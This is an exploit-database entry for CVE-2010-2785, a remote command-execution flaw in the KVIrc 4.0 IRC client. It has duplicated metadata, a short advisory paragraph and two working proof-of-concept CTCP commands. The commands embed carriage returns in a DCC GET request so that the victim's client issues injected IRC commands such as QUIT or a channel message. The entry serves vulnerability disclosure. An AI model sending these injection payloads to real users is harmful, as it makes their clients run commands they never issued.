KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution
| EKU-ID: 39111 | CVE: CVE-2010-2785;OSVDB-66648 | OSVDB-ID: |
| Author: unic0rn | Published: 2010-07-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 39111 | CVE: CVE-2010-2785;OSVDB-66648 | OSVDB-ID: |
| Author: unic0rn | Published: 2010-07-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/42026/info KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application. KVIrc 4.0.0 is vulnerable; other versions may also be affected. /ctcp nickname DCC GET\rQUIT\r /ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r